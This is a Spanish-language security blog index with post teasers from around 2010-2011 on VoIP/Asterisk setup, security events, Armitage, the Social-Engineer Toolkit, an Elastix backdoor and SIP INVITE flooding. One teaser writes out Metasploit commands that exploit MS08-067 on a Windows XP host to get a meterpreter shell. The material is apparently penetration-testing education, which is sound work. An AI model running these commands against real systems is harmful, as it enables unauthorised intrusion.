-
Continue reading →: El evento máximo de IN-Seguridad Informática : LimaHack 2011
Por tercer año consecutivo , se realizara en la ciudad de Lima este 05 de noviembre , uno de los eventos de in-seguridad mas interesantes que se realizan en el Perù , LimaHack 2011 , el cual tendrá como sede, la Universidad Peruana de Ciencias Aplicadas «UPC». Los temas a tratar…
-
Continue reading →: Probando vulnerabilidad en Elastix (Backdoor Freebx)
En los últimos años con el despegue de las «Distribuciones Asterisk» , han echo que prácticamente cualquier ser humano, pueda instalarse una plataforma de comunicaciones de voz, sin mucho esfuerzo. lo cual ha producido desde mi punto de vista, graves descuidos, al pensar que una plataforma de voz o voip…
-
Continue reading →: Instalación tarjeta transcoding Sangoma D100 sobre Asterisk y Linux Centos 5.6
Hace poco me tope con esta tarjeta , aquí va el manual de instalación sobre Linux Centos 5.6 1.- INSTALACION FISICA DE LA TARJETA Insertar la tarjeta D100 PCI/PCIe esta sera reconocida por Centos como una tarjeta de red : #lspci -l 09:00.0 Ethernet controller: Broadcom Corporation NetXtreme BCM5723 Gigabit…
-
Continue reading →: Flisol 2011 en Peru
Este sabado 30 de abril se va realizar el 7mo Festival Latinoamericano de Software Libre «FLISOL 2011» , particularmente voy a tener el gusto de participar con un ponencia «Seguridad en entornos Voip, ataques y mecanismos de protección» en la sede de la Universidad del Callao. SEDE Lima Norte Universidad…
-
Continue reading →: Instalacion de codec g729 free para Asterisk Linux
En algunos casos es necesario probar ciertas funcionalidades en los cuales se necesitan tener codecs g729 instalados en nuestra plataforma , para esto viene bien usar los famosos codecs free , aunque no los recomiendo para entornos de producción, para instalarlos en maquinas virtuales por ejemplo y hacer pruebas no…
-
Continue reading →: Los números de 2010
Comparto la información que gentilmente la gente de WordPress.com me envío , gracias por visitar mi blog :D, Feliz año para todos !!! Los duendes de estadísticas de WordPress.com han analizado el desempeño de este blog en 2010 y te presentan un resumen de alto nivel de la salud de…
-
Continue reading →: Configuración de Armitage sobre Ubuntu 10.10
Armitage es un administrador gráfico para Metasploit (Framework para testing de seguridad) , el tiene tiene como objetivo que el uso de metasploit sea mas sencillo. 😀 En este caso se realizara sobre ubuntu 10.10 y se asume que ya se tiene corriendo metasploit en el sistema. 1.- Instalación y…
-
Continue reading →: Framework para ataques de ingenieria social «The Social-Engineer Toolkit : SET»
SET , es un conjunto de herramientas diseñadas para hacer ataques de ingenieria social , esta programado en python por David Kennedy , es capas de realizar envios de correo electronico individulaes o masivos , para realizar capturas de contraseñas mediante falsificacion de paginas web (ejem gmail) , obtencion de…
-
Continue reading →: Ingresando a un Windows XP con Metasploit
Metasploit es un framework de seguridad bastante conocido, el siguiente método mostrara como obtener una shell de un WIn XP SP3 explotando la vulnerabilidad MS08-067 de Windows Instalando Metasploit #wget http://updates.metasploit.com/data/releases/framework-3.5.0.tar.bz2 #tar xvfz framework-3.5.0.tar.bz2 #cd framework-3.5.0/bin #./msfconsole msf>use windows/smb/ms08_067_netapi msf>set RHOST 192.168.0.24 msf>set PAYLOAD windows/meterpreter/bind_tcp msf>exploit meterpreter > shell Process…
-
Continue reading →: Ataques sip inviteflood a un Asterisk
En realidad este no es un concepto nuevo, siempre ha existido y mas por la deficiencia del protocolo sip que por el tipo de plataforma. El método consiste en explotar una vulnerabilidad del protocolo SIP , haciendo un envio masivo de peticiones INVITE de esta forma : Instalación de la…
Juan Oliva
Consultor en Ciberseguridad con mas de 17 años de experiencia en el campo, muy involucrado en proyectos de Ethical Hacking, análisis y explotación de vulnerabilidades en infraestructura, aplicaciones web, APIs y Móviles, pruebas de ingeniería social y revisión de código.
Juan Oliva 